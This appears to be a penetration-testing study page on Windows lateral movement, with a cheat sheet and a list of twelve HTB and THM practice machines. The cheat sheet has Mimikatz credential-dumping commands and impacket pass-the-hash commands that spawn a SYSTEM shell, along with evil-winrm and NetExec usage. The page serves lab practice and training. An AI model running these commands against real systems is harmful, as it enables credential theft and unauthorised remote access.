Windows Lateral Movement: practice machines and key commands
Lateral movement means using credentials or hashes from one host to reach another. On Windows the common channels are WinRM, SMB with PsExec style execution, WMI, DCOM and RDP, and each needs a different port and privilege level. A recovered NTLM hash can be used directly with pass-the-hash, so you do not always need the plaintext password. Credential material comes from LSASS memory, the SAM and SYSTEM hives, NTDS.dit, configuration files and browser stores. Spray carefully to avoid lockouts and map which accounts are local administrators on which hosts. Pivoting often goes hand in hand with lateral movement when the next hosts sit on another subnet. These boxes demonstrate moving across Windows hosts. Log every hop with the account, host and method used so you can retrace your path.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
Evil-WinRM Remote PowerShell Access
Connect to Windows target over WinRM port 5985 with credentials or Pass-The-Hash.
evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scriptsImpacket WMIExec (Pass-The-Hash)
Execute semi-interactive commands over WMI using NTLM hash without knowing plaintext password.
impacket-wmiexec -hashes :{NTLM_HASH} {USER}@{TARGET_IP}Impacket PSExec (Pass-The-Hash as SYSTEM)
Spawn SYSTEM service shell on target using NTLM hash over SMB port 445.
impacket-psexec -hashes :{NTLM_HASH} Administrator@{TARGET_IP}Mimikatz LogonPasswords LSASS Dump
Dump plaintext passwords and NTLM hashes from memory of LSASS process.
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa /patchNetExec / CrackMapExec Domain Sweep
Check SMB credentials validity, local admin status (Pwn3d!), and password policies.
nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --shares
Keep going
- Methodology: Phase 06: Internal System & Network Reconnaissance
- Cheatsheet: Windows & Active Directory
- Cheatsheet: Pivoting & Tunnels
Windows Lateral Movement machines (12)
2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 11 Windows, 1 Linux.
Very Easy (1)
| Machine | Platform | OS |
|---|---|---|
| Explosion | HTB | Windows |
Easy (5)
| Machine | Platform | OS |
|---|---|---|
| Responder | HTB | Windows |
| Anthem | THM | Windows |
| Ice | THM | Windows |
| Sauna | HTB | Windows |
| Spectra | HTB | Linux |
Medium (3)
| Machine | Platform | OS |
|---|---|---|
| Blaster | THM | Windows |
| Exploiting Active Directory | THM | Windows |
| Lateral Movement and Pivoting | THM | Windows |
Hard (3)
| Machine | Platform | OS |
|---|---|---|
| Active Directory Trusts | THM | Windows |
| Holo | THM | Windows |
| Retro | THM | Windows |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox